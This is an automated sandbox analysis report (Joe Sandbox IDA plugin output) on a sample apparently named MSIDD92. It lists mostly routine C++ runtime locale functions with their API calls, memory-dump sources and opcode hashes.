• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
• String ID:
• API String ID: 743221004-0
• Opcode ID: 34d19d15e3bada96494a3aa078dc3e2891087d89e0e2233b80e8a9e01728d47a
• Instruction ID: 619945463d2c09ed7e82d48ed1d61b17976babcb635d480bcc3de09aa8e5dc5f
• Opcode Fuzzy Hash: 34d19d15e3bada96494a3aa078dc3e2891087d89e0e2233b80e8a9e01728d47a
• Instruction Fuzzy Hash: 1A01D236900219CBCF01FBA4D8566AEB761EF80720F29400AF414AB392EF709E059FB0
APIs
• __EH_prolog3.LIBCMT ref: 00D875BD
• std::_Lockit::_Lockit.LIBCPMT ref: 00D875C7
  • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
  • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
• codecvt.LIBCPMT ref: 00D87601
• std::_Facet_Register.LIBCPMT ref: 00D87618
• std::_Lockit::~_Lockit.LIBCPMT ref: 00D87638
Memory Dump Source
• Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
• Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
• String ID:
• API String ID: 712880209-0
• Opcode ID: 8ffea4aa8775b16e60b4e4a3ef8569639c98db36b98abce80917d15c1425acbb
• Instruction ID: 94e3a901ba63feb2cc1ecc39f9ab308a5e15d50bc8acce926c757f9ccab7e5d3
• Opcode Fuzzy Hash: 8ffea4aa8775b16e60b4e4a3ef8569639c98db36b98abce80917d15c1425acbb
• Instruction Fuzzy Hash: 1D01C0359046199BCF01FB68D8066AE7761EF80720F28400AE411AB392EF70DE01DBB0
APIs
• __EH_prolog3.LIBCMT ref: 00D876E7
• std::_Lockit::_Lockit.LIBCPMT ref: 00D876F1
  • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
  • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
• collate.LIBCPMT ref: 00D8772B
• std::_Facet_Register.LIBCPMT ref: 00D87742
• std::_Lockit::~_Lockit.LIBCPMT ref: 00D87762
Memory Dump Source
• Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
• Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
• String ID:
• API String ID: 1007100420-0
• Opcode ID: c55ef961d9b2de16af54a590d1a1c850e20667221129f9ddf7c4a8d4568bebbb
• Instruction ID: 8c468291dd6f5610e675855e8f717ab314b4238bc0a7936d708d4114f07a5e5d
• Opcode Fuzzy Hash: c55ef961d9b2de16af54a590d1a1c850e20667221129f9ddf7c4a8d4568bebbb
• Instruction Fuzzy Hash: DE01D235904219DBCF01FB64D8066AE7766EF84720F28410AF415AB392EF70DE01DBB0
APIs
• __EH_prolog3.LIBCMT ref: 00D87652
• std::_Lockit::_Lockit.LIBCPMT ref: 00D8765C
  • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
  • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
• codecvt.LIBCPMT ref: 00D87696
• std::_Facet_Register.LIBCPMT ref: 00D876AD
• std::_Lockit::~_Lockit.LIBCPMT ref: 00D876CD
Memory Dump Source
• Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
• Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
• String ID:
• API String ID: 712880209-0
• Opcode ID: eba3e8cac69ef67dfdee8f93c7cf4b25866194bdba7b7a4c12409c05c48abc44
• Instruction ID: 9d53e1f92a0d581564504cf2f4ef32fbfd1c1ab024f4426d8b91fd16df237464
• Opcode Fuzzy Hash: eba3e8cac69ef67dfdee8f93c7cf4b25866194bdba7b7a4c12409c05c48abc44
• Instruction Fuzzy Hash: 4101C035900A199BCF01FB68D846AAD7B61EF84721F29400AE411AB391EF70DE019FB0
APIs
• __EH_prolog3.LIBCMT ref: 00D8266B
• std::_Lockit::_Lockit.LIBCPMT ref: 00D82675
  • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
  • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
• codecvt.LIBCPMT ref: 00D826AF
• std::_Facet_Register.LIBCPMT ref: 00D826C6
• std::_Lockit::~_Lockit.LIBCPMT ref: 00D826E6
Memory Dump Source
• Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
• Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
• String ID:
• API String ID: 712880209-0
• Opcode ID: a779d24019a53494f8c3ca37a0af75518598dd8b54d18975d19eedc1366ab46b
• Instruction ID: 6d614f0b843994758d9408002c4c93b81f9400ce31bad94149ca2bb7002a3f3f
• Opcode Fuzzy Hash: a779d24019a53494f8c3ca37a0af75518598dd8b54d18975d19eedc1366ab46b
• Instruction Fuzzy Hash: 3701DE35900219DBCF05FB64E8466BE7BA1EF80720F28400AF411AB391EF709E019BB0
APIs
• __EH_prolog3.LIBCMT ref: 00D8777C
• std::_Lockit::_Lockit.LIBCPMT ref: 00D87786
  • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
  • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
• collate.LIBCPMT ref: 00D877C0
• std::_Facet_Register.LIBCPMT ref: 00D877D7
• std::_Lockit::~_Lockit.LIBCPMT ref: 00D877F7
Memory Dump Source
• Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
• Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
• String ID:
• API String ID: 1007100420-0
• Opcode ID: 3803d7bf6741b32789ec8daf65d0a052ba9262cb6e18230a7bbe19181b01a2c7
• Instruction ID: 372e8923aacdb279848c140ffbb0fcdb42e25c269df8a6c76a983ddcf32e3c82
• Opcode Fuzzy Hash: 3803d7bf6741b32789ec8daf65d0a052ba9262cb6e18230a7bbe19181b01a2c7
• Instruction Fuzzy Hash: 95018075904219DBCF05FB64D8466AE7771EF84720F28454AE415AB392EF74DE01CBB0
APIs
• __EH_prolog3.LIBCMT ref: 00D938C8
• std::_Lockit::_Lockit.LIBCPMT ref: 00D938D2
  • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
  • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
• collate.LIBCPMT ref: 00D9390C
• std::_Facet_Register.LIBCPMT ref: 00D93923
• std::_Lockit::~_Lockit.LIBCPMT ref: 00D93943
Memory Dump Source
• Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
• Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
• String ID:
• API String ID: 1007100420-0
• Opcode ID: 51be6e1463aef441c46bcf2b4911d20b5f8fff21b36a60614895e298d3e040cc
• Instruction ID: 5227f24a12fd033fb2b4ba095caafaf193406b49d9ab866c6c51f29a3084c7a9
• Opcode Fuzzy Hash: 51be6e1463aef441c46bcf2b4911d20b5f8fff21b36a60614895e298d3e040cc
• Instruction Fuzzy Hash: 9C019235900619DBCF05EB64D8067BEBB65EF84720F28450AF415AB391EF749F018BB4
APIs
• __EH_prolog3.LIBCMT ref: 00D878A6
• std::_Lockit::_Lockit.LIBCPMT ref: 00D878B0
  • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
  • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
• messages.LIBCPMT ref: 00D878EA
• std::_Facet_Register.LIBCPMT ref: 00D87901
• std::_Lockit::~_Lockit.LIBCPMT ref: 00D87921
Memory Dump Source
• Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
• Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
• String ID:
• API String ID: 2750803064-0
• Opcode ID: a5d3ff9407f1304051806fa1639f27491844ed746fdb0b1123774c6eaff22f33
• Instruction ID: ab774d2dad9cdbaac5e08881906d7478b5a4ec608661e44cf058935ed0fa8883
• Opcode Fuzzy Hash: a5d3ff9407f1304051806fa1639f27491844ed746fdb0b1123774c6eaff22f33
• Instruction Fuzzy Hash: 3A01C035900219CBCF05FB64D8466AE7766EF84720F28440AF418AB3A2EF74DE01CBB0
APIs
• __EH_prolog3.LIBCMT ref: 00D87811
• std::_Lockit::_Lockit.LIBCPMT ref: 00D8781B
  • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
  • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
• ctype.LIBCPMT ref: 00D87855
• std::_Facet_Register.LIBCPMT ref: 00D8786C
• std::_Lockit::~_Lockit.LIBCPMT ref: 00D8788C
Memory Dump Source
• Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
• Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
• String ID:
• API String ID: 83828444-0
• Opcode ID: e0b57ff005c08687136d7ec6733affd15d8ec3480d27fb21ba17f75d37fa90b4
• Instruction ID: eb74cbe92387904c9a6b3529dbd322015a3a8359ba34e340fb06dc8f6e652ad0
• Opcode Fuzzy Hash: e0b57ff005c08687136d7ec6733affd15d8ec3480d27fb21ba17f75d37fa90b4
• Instruction Fuzzy Hash: 3C01C075904219DBCB05FBA4D80A6AD7B71EF80720F28450AE411AB391EF70DE01CBB0
APIs
• __EH_prolog3.LIBCMT ref: 00D9395D
• std::_Lockit::_Lockit.LIBCPMT ref: 00D93967
  • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
  • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
• messages.LIBCPMT ref: 00D939A1
• std::_Facet_Register.LIBCPMT ref: 00D939B8
• std::_Lockit::~_Lockit.LIBCPMT ref: 00D939D8
Memory Dump Source
• Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
• Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
• String ID:
• API String ID: 2750803064-0
• Opcode ID: 063173feec5bfb2a0cbeff443ac5168151f08ed7957ac57e0bccd390b37ae8d2
• Instruction ID: 188ac98054a14f20245d2b984f46c7735c9525aec62f9730b6e864eb017440f6
• Opcode Fuzzy Hash: 063173feec5bfb2a0cbeff443ac5168151f08ed7957ac57e0bccd390b37ae8d2
• Instruction Fuzzy Hash: 3401C0359002199BCF01EB64D8067AD77B5EF80720F28450AF415AB391EF709F01CBB0
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D8793B
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D87945
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • messages.LIBCPMT ref: 00D8797F
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D87996
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D879B6
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                      • String ID:
                                                                      • API String ID: 2750803064-0
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D93BB1
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D93BBB
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • moneypunct.LIBCPMT ref: 00D93BF5
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D93C0C
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D93C2C
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                      • String ID:
                                                                      • API String ID: 419941038-0
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D93B1C
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D93B26
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • moneypunct.LIBCPMT ref: 00D93B60
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D93B77
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D93B97
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                      • String ID:
                                                                      • API String ID: 419941038-0
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D87CB9
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D87CC3
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • moneypunct.LIBCPMT ref: 00D87CFD
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D87D14
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D87D34
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                      • String ID:
                                                                      • API String ID: 419941038-0
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D87C24
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D87C2E
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • moneypunct.LIBCPMT ref: 00D87C68
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D87C7F
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D87C9F
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                      • String ID:
                                                                      • API String ID: 419941038-0
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D87DE3
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D87DED
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • moneypunct.LIBCPMT ref: 00D87E27
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D87E3E
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D87E5E
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                      • String ID:
                                                                      • API String ID: 419941038-0
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D87D4E
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D87D58
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                      • moneypunct.LIBCPMT ref: 00D87D92
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D87DA9
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D87DC9
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                      • String ID:
                                                                      • API String ID: 419941038-0
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32(00DD4AF8,?,?,00D72627,00DD571C,00DBCCC0), ref: 00D97835
                                                                      • LeaveCriticalSection.KERNEL32(00DD4AF8,?,?,00D72627,00DD571C,00DBCCC0), ref: 00D97868
                                                                      • RtlWakeAllConditionVariable.NTDLL ref: 00D978DF
                                                                      • SetEvent.KERNEL32(?,00D72627,00DD571C,00DBCCC0), ref: 00D978E9
                                                                      • ResetEvent.KERNEL32(?,00D72627,00DD571C,00DBCCC0), ref: 00D978F5
                                                                      Similarity
                                                                      • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                                      • String ID:
                                                                      • API String ID: 3916383385-0
                                                                      APIs
                                                                      • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00D760F4
                                                                      • GetLastError.KERNEL32 ref: 00D76190
                                                                        • Part of subcall function 00D71FC0: FindResourceW.KERNEL32(00000000,?,00000006,?,00000000,00DB938D,000000FF,?,80070057,?,?,00000000,00000010,00D71B09,?), ref: 00D72040
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000000,00000009,00DCB2DC,00000001,00000000), ref: 00D7614E
                                                                      Similarity
                                                                      • API ID: DirectoryErrorFindLastLibraryLoadResourceSystem
                                                                      • String ID: ntdll.dll
                                                                      • API String ID: 4113295189-2227199552
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D8D2C9
                                                                        • Part of subcall function 00D86FF9: _Maklocstr.LIBCPMT ref: 00D87019
                                                                        • Part of subcall function 00D86FF9: _Maklocstr.LIBCPMT ref: 00D87036
                                                                        • Part of subcall function 00D86FF9: _Maklocstr.LIBCPMT ref: 00D87053
                                                                        • Part of subcall function 00D86FF9: _Maklocchr.LIBCPMT ref: 00D87065
                                                                        • Part of subcall function 00D86FF9: _Maklocchr.LIBCPMT ref: 00D87078
                                                                      • _Mpunct.LIBCPMT ref: 00D8D356
                                                                      • _Mpunct.LIBCPMT ref: 00D8D370
                                                                      Similarity
                                                                      • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                      • String ID: $+xv
                                                                      • API String ID: 2939335142-1686923651
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Mpunct$H_prolog3
                                                                      • String ID: $+xv
                                                                      • API String ID: 4281374311-1686923651
                                                                      • Opcode ID: e674e2b2d7979da88c2fcf1b9b845126c6bb54aa5a8d5b7af4b213d0bbc3ff67
                                                                      • Instruction ID: ab8a74ef1a43b2a9536b940d9d11738e2904adef0ab8f9423bd9dfd86ab433f2
                                                                      • Opcode Fuzzy Hash: e674e2b2d7979da88c2fcf1b9b845126c6bb54aa5a8d5b7af4b213d0bbc3ff67
                                                                      • Instruction Fuzzy Hash: 0C2181B1904B92AEDB25DF758450B7BBEE8FB09710F04455AE459C7A42D734E602CBB0
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00D9BFC3,00000000,?,00DD4EA4,?,?,?,00D9C166,00000004,InitializeCriticalSectionEx,00DBF92C,InitializeCriticalSectionEx), ref: 00D9C01F
                                                                      • GetLastError.KERNEL32(?,00D9BFC3,00000000,?,00DD4EA4,?,?,?,00D9C166,00000004,InitializeCriticalSectionEx,00DBF92C,InitializeCriticalSectionEx,00000000,?,00D9BF1D), ref: 00D9C029
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00D9C051
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad$ErrorLast
                                                                      • String ID: api-ms-
                                                                      • API String ID: 3177248105-2084034818
                                                                      • Opcode ID: 05e7ecd61b67dbaf12b989cffa38df8c654a8107347a16a2702d1d6e9a85ce74
                                                                      • Instruction ID: 0a0bce67341cfacc7ecb399943a7a9e4d37a80d60c79cd65ed8cf02dde6fc621
                                                                      • Opcode Fuzzy Hash: 05e7ecd61b67dbaf12b989cffa38df8c654a8107347a16a2702d1d6e9a85ce74
                                                                      • Instruction Fuzzy Hash: 21E01A74294308FBEF202BA2EC06B593B5A9B01B51F244020FA0CE81E0E762A95596F4
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLocal_strcspn
                                                                      • String ID:
                                                                      • API String ID: 2585785616-0
                                                                      • Opcode ID: b5add647bb4d0a27c5a70c829892a051f0c827505ad1a32ef9fd8e0573ae0d0b
                                                                      • Instruction ID: 6c62c14f56d8b38c7154b02ecd233161ecf2f3850cc32332f9863a080eeb30cc
                                                                      • Opcode Fuzzy Hash: b5add647bb4d0a27c5a70c829892a051f0c827505ad1a32ef9fd8e0573ae0d0b
                                                                      • Instruction Fuzzy Hash: 8EF13775A00249DFDF15CFA8C984AEEBBB6FF48304F148169E819EB251E731E945CB60
                                                                      APIs
                                                                      • GetConsoleOutputCP.KERNEL32(862265DA,?,00000000,?), ref: 00DB73EE
                                                                        • Part of subcall function 00DB002B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00DAC527,?,00000000,-00000008), ref: 00DB00D7
                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00DB7649
                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00DB7691
                                                                      • GetLastError.KERNEL32 ref: 00DB7734
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                      • String ID:
                                                                      • API String ID: 2112829910-0
                                                                      • Opcode ID: 52febe46b16e39be5e9a1a0b7cabde91443f93228eb48f37872e2abe919af76a
